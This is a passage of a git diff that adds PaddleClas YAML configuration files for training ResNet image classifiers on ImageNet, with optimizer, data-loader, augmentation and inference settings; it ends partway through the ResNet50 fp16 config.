Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml new file mode 100644 index 0000000..a4f228f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 
0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml new file mode 100644 index 0000000..83d1fc0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml @@ -0,0 +1,130 @@ +# 
global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet101_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - 
ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml new file mode 100644 index 0000000..b915713 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet152 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + 
use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml new file mode 100644 index 0000000..e09bb60 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet152_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: 
Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml new file mode 100644 index 0000000..64edd5e --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet18 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 
10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml new file mode 100644 index 0000000..e0ba71a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet18_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + 
drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml new file mode 100644 index 0000000..98de87e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet200_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum 
+ momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml new file mode 100644 index 0000000..92f4569 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet34 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 
10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml new file mode 100644 index 0000000..9ff0717 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet34_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + 
drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml new file mode 100644 index 0000000..b338b63 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + 
+Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml new file mode 
100644 index 0000000..e58539b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml @@ -0,0 +1,147 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_channel: &image_channel 4 + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: &use_pure_fp16 True + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + input_image_channel: *image_channel + data_format: "NHWC" + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + multi_precision: *use_pure_fp16 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - 
